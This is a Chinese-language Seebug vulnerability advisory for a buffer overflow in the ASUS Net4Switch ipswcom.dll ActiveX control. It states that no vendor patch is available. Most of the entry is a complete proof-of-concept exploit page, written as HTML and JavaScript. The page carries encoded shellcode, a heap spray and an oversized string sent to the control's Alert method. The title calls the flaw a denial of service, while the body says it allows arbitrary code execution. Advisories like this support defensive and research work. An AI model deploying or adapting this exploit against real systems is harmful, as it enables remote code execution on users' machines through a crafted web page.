ASUS Net4Switch 'ipswcom.dll' ActiveX远程拒绝服务漏洞

2012-03-01T00:00:00
ID SSV:30157
Type seebug
Reporter Root
Modified 2012-03-01T00:00:00

Description

BUGTRAQ ID: 52110

ASUS Net4Switch是华硕电脑上网络管理软件。

ASUS Net4Switch ipswcom.dll组件在实现上存在缓冲区溢出漏洞,远程攻击者可通过特制的html网页执行任意代码 0 Asus Net4Switch ipswcom.dll 1.0.0.1 厂商补丁:

Asus

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.asus.com.tw

                                        
                                            
                                                <HTML>
<HEAD>
<TITLE>DSecRG: Asus exploit by EvdokimovDS</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E'></object>
<SCRIPT>

function Exploit()
{

//Shellcode – exec notepad
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%
u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61
%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud00
1%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3c
e3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf
475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u
588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%
ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850
%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063
c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u74
6f%u7065%u6461%u0000");

//Heap-spray
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++) mem[i]=bigbk+shell;

//Buffer overflow
var bf=unescape("%u0d0d%u0d0d");
var buf="";
while (buf.length<8000) buf=buf+bf;

vuln.Alert(buf);
}

Exploit();
</SCRIPT>
</BODY>
</HTML>